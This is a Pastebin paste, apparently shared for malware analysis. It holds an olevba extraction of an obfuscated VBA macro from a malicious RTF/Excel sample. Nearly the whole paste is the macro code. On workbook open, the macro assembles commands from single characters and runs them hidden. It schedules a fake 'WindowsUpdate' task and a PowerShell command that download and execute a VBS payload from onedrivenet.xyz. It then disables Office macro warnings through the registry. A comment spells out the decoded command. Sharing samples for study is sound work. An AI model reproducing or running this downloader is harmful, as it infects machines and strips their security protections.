API tools faq
paste
Advertisement
dissectmalware

Malicious VBA macros

dissectmalware
Apr 5th, 2018
500
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 33.83 KB | None | 0 0
raw download clone embed print report
  1. ' macro extracted from a malicious rtf file (Do not open/run on a production machine):
  2. ' https://www.hybrid-analysis.com/sample/2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7?environmentId=100
  3. ' Analysis: https://twitter.com/DissectMalware/status/981766295774531586
  4.  
  5. olevba 0.52 - http://decalage.info/python/oletools
  6. Flags        Filename                                                        
  7. -----------  -----------------------------------------------------------------
  8. OpX:MASIH--- C:\Users\user\Downloads\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin_object_000A25F5\Package
  9. ===============================================================================
  10. FILE: C:\Users\user\Downloads\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin\2699f47fc3c90494d12c55ecdee6af701b3715e3e5c9545e8d3a65e0daa134c7.bin_object_000A25F5\Package
  11. Type: OpenXML
  12. -------------------------------------------------------------------------------
  13. VBA MACRO ThisWorkbook.cls
  14. in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
  15. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  16. Private Sub Workbook_Open()
  17. Set ASdiW834hkjasdDk8 = CreateObject("WScript.Shell")
  18.    Dim ASdiW83ASdjSn1
  19.    Dim ASdiW83ASdjSn2
  20.    Dim ASdiW83ASdjSn3
  21.    Dim ASdiW83ASdjSn4
  22.    Dim ASdiW83ASdjSn5
  23.    Dim ASdiW83ASdjSn6
  24.    Dim ASdiW83ASdjSn7
  25.    
  26.     ASdiW83ASdjSn1 = "S"
  27.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "c"
  28.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "h"
  29.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "T"
  30.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "a"
  31.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s"
  32.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "k"
  33.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s /"
  34.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "C"
  35.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "r"
  36.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "e"
  37.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "a"
  38.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "t"
  39.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "e /"
  40.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "s"
  41.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "c M"
  42.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "I"
  43.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "N"
  44.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "U"
  45.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "T"
  46.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "E /"
  47.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "M"
  48.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "O 1 /T"
  49.     ASdiW83ASdjSn1 = ASdiW83ASdjSn1 & "N W"
  50.     ASdiW83ASdjSn2 = "i"
  51.     ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "n"
  52.      ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  53.       ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "o"
  54.        ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "w"
  55.         ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "s"
  56.          ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "U"
  57.           ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "p"
  58.            ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  59.             ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "a"
  60.              ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "t"
  61.               ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e /"
  62.                ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "T"
  63.                 ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "R ""P"
  64.                  ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "o"
  65.                   ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "w"
  66.                    ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
  67.                     ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "r"
  68.                      ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "s"
  69.                       ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "h"
  70.                        ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
  71.                         ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "l"
  72.                          ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "l -W H"
  73.                           ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "i"
  74.                            ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  75.                             ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "d"
  76.                              ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "e"
  77.                               ASdiW83ASdjSn2 = ASdiW83ASdjSn2 & "n ("
  78.     ASdiW83ASdjSn3 = "N"
  79.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  80.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "w"
  81.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "-"
  82.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "O"
  83.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "b"
  84.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "j"
  85.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  86.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "c"
  87.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t S"
  88.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "y"
  89.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "s"
  90.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t"
  91.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  92.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "m"
  93.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
  94.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "N"
  95.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "et"
  96.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
  97.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "W"
  98.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  99.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "b"
  100.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "C"
  101.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "l"
  102.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "i"
  103.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "e"
  104.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "n"
  105.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "t"
  106.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & ")"
  107.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "."
  108.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "D"
  109.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "o"
  110.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "w"
  111.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "n"
  112.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "l"
  113.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "o"
  114.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "a"
  115.     ASdiW83ASdjSn3 = ASdiW83ASdjSn3 & "d"
  116.     ASdiW83ASdjSn4 = "F"
  117.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "i"
  118.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "l"
  119.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "e"
  120.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "("
  121.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
  122.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
  123.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\""http://onedrivenet.xyz/work/19.vbs\"
  124.     ASdiW83ASdjSn4 = ASdiW83ASdjSn4 & "\"
  125.     ASdiW83ASdjSn5 = "\"",\"
  126.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  127.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\""$"
  128.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "e"
  129.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "n"
  130.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
  131.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & ":"
  132.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "p"
  133.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "u"
  134.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "b"
  135.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "l"
  136.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "i"
  137.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "c"
  138.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  139.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
  140.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
  141.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "c"
  142.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "h"
  143.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "o"
  144.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
  145.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "t"
  146.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "3"
  147.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "2"
  148.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "5"
  149.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "."
  150.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "v"
  151.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "b"
  152.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "s"
  153.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  154.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"
  155.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "\"")"
  156.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & ";"
  157.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "("
  158.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "N"
  159.     ASdiW83ASdjSn5 = ASdiW83ASdjSn5 & "e"
  160.     ASdiW83ASdjSn6 = "w"
  161.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "-"
  162.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "O"
  163.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "b"
  164.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "j"
  165.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  166.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  167.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t -"
  168.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  169.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "o"
  170.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "m S"
  171.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "h"
  172.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  173.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  174.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  175.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "."
  176.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "A"
  177.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "p"
  178.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "p"
  179.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  180.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "i"
  181.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  182.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "a"
  183.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t"
  184.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "i"
  185.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "o"
  186.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "n"
  187.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & ")"
  188.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "."
  189.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "S"
  190.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "h"
  191.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  192.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  193.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "l"
  194.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "E"
  195.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "x"
  196.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "e"
  197.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "c"
  198.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "u"
  199.     ASdiW83ASdjSn6 = ASdiW83ASdjSn6 & "t"
  200.     ASdiW83ASdjSn7 = "e"
  201.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "("
  202.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  203.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  204.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\""$"
  205.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "e"
  206.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "n"
  207.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "v"
  208.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & ":"
  209.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "p"
  210.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "u"
  211.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "b"
  212.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "l"
  213.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "i"
  214.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "c"
  215.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  216.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "s"
  217.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "v"
  218.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "c"
  219.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "h"
  220.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "o"
  221.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "s"
  222.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "t"
  223.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "3"
  224.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "2"
  225.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "5"
  226.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "."
  227.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "vbs"
  228.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  229.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"
  230.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "\"");"" /"
  231.     ASdiW83ASdjSn7 = ASdiW83ASdjSn7 & "F "
  232.  
  233. ASdiW83ASdjSn200 = ASdiW83ASdjSn1 + ASdiW83ASdjSn2 + ASdiW83ASdjSn3 + ASdiW83ASdjSn4 + ASdiW83ASdjSn5 + ASdiW83ASdjSn6 + ASdiW83ASdjSn7
  234.  
  235.  
  236.  
  237. ASdiW834hkjasdDk8.Run ASdiW83ASdjSn200, vbHide
  238.  
  239.  
  240. ' ASdiW83ASdjSn200 "SchTasks /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://onedrivenet.xyz/work/19.vbs\\\",\\\"$env:public\svchost325.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost325.vbs\\\");" /F "
  241.  
  242.  
  243.  
  244.  
  245.  
  246.  
  247. Set FiNoa9L = CreateObject("WScript.Shell")
  248.    Dim FiNSincals3ASdoa9L1
  249.    Dim FiNSincals3ASdoa9L2
  250.    Dim FiNSincals3ASdoa9L3
  251.    Dim FiNSincals3ASdoa9L4
  252.    Dim FiNSincals3ASdoa9L5
  253.    Dim FiNSincals3ASdoa9L6
  254.    Dim FiNSincals3ASdoa9L7
  255.    Dim FiNSincals3ASdoa9L8
  256.    Dim FiNSincals3ASdoa9L9
  257.    Dim FiNSincals3ASdoa9L010
  258.    Dim FiNSincals3ASdoa9L011
  259.    Dim FiNSincals3ASdoa9L012
  260.    Dim FiNSincals3ASdoa9L013
  261.    Dim FiNSincals3ASdoa9L014
  262.  
  263.  
  264.    
  265. FiNSincals3ASdoa9L1 = "P"
  266. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "o"
  267. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "w"
  268. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "e"
  269. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "r"
  270. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "S"
  271. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "h"
  272. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "e"
  273. FiNSincals3ASdoa9L1 = FiNSincals3ASdoa9L1 & "l"
  274. FiNSincals3ASdoa9L2 = "l"
  275. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & " ("
  276. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "N"
  277. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "e"
  278. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "w"
  279. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "-"
  280. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "O"
  281. FiNSincals3ASdoa9L2 = FiNSincals3ASdoa9L2 & "b"
  282. FiNSincals3ASdoa9L3 = "j"
  283. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "e"
  284. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "c"
  285. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "t "
  286. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "S"
  287. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "y"
  288. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "s"
  289. FiNSincals3ASdoa9L3 = FiNSincals3ASdoa9L3 & "t"
  290. FiNSincals3ASdoa9L4 = "e"
  291. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "m"
  292. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "."
  293. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "N"
  294. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "e"
  295. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "t"
  296. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "."
  297. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "W"
  298. FiNSincals3ASdoa9L4 = FiNSincals3ASdoa9L4 & "e"
  299. FiNSincals3ASdoa9L5 = "b"
  300. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "C"
  301. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "l"
  302. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "i"
  303. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "e"
  304. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "n"
  305. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "t"
  306. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & ")"
  307. FiNSincals3ASdoa9L5 = FiNSincals3ASdoa9L5 & "."
  308. FiNSincals3ASdoa9L6 = "D"
  309. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "o"
  310. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "w"
  311. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "n"
  312. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "l"
  313. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "o"
  314. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "a"
  315. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "d"
  316. FiNSincals3ASdoa9L6 = FiNSincals3ASdoa9L6 & "F"
  317. FiNSincals3ASdoa9L7 = "i"
  318. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "l"
  319. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "e"
  320. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "("
  321. FiNSincals3ASdoa9L7 = FiNSincals3ASdoa9L7 & "'http://onedrivenet.xyz/work/19.vbs',"
  322. FiNSincals3ASdoa9L8 = "'"
  323. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "%"
  324. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "P"
  325. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "u"
  326. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "b"
  327. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "lic"
  328. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "%"
  329. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "\"
  330. FiNSincals3ASdoa9L8 = FiNSincals3ASdoa9L8 & "s"
  331. FiNSincals3ASdoa9L9 = "v"
  332. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "c"
  333. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "h"
  334. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "o"
  335. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "s"
  336. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "t"
  337. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "3"
  338. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "2"
  339. FiNSincals3ASdoa9L9 = FiNSincals3ASdoa9L9 & "."
  340. FiNSincals3ASdoa9L010 = "v"
  341. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "b"
  342. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "s"
  343. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "'"
  344. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & ")"
  345. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & ";"
  346. FiNSincals3ASdoa9L010 = FiNSincals3ASdoa9L010 & "S"
  347. FiNSincals3ASdoa9L011 = "t"
  348. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "a"
  349. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "r"
  350. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "t"
  351. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "-"
  352. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "P"
  353. FiNSincals3ASdoa9L011 = FiNSincals3ASdoa9L011 & "r"
  354. FiNSincals3ASdoa9L012 = "o"
  355. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "c"
  356. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "e"
  357. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "s"
  358. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "s"
  359. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & " '"
  360. FiNSincals3ASdoa9L012 = FiNSincals3ASdoa9L012 & "%"
  361. FiNSincals3ASdoa9L013 = "P"
  362. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "u"
  363. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "b"
  364. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "lic"
  365. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "%"
  366. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "\"
  367. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "s"
  368. FiNSincals3ASdoa9L013 = FiNSincals3ASdoa9L013 & "v"
  369. FiNSincals3ASdoa9L014 = "c"
  370. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "h"
  371. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "o"
  372. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "s"
  373. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "t"
  374. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "3"
  375. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "2"
  376. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "."
  377. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "v"
  378. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "b"
  379. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "s"
  380. FiNSincals3ASdoa9L014 = FiNSincals3ASdoa9L014 & "'"
  381.  
  382.  
  383.    
  384. FiNSincals3ASdoa9L20 = FiNSincals3ASdoa9L1 + FiNSincals3ASdoa9L2 + FiNSincals3ASdoa9L3 + FiNSincals3ASdoa9L4 + FiNSincals3ASdoa9L5 + FiNSincals3ASdoa9L6 + FiNSincals3ASdoa9L7 + FiNSincals3ASdoa9L8 + FiNSincals3ASdoa9L9 + FiNSincals3ASdoa9L010 + FiNSincals3ASdoa9L011 + FiNSincals3ASdoa9L012 + FiNSincals3ASdoa9L013 + FiNSincals3ASdoa9L014
  385.     FiNoa9L.Run FiNSincals3ASdoa9L20, vbHide
  386. Set wso = CreateObject("WScript.Shell")
  387. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  388. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  389. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  390. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  391. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  392. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  393. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  394. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  395. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  396. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
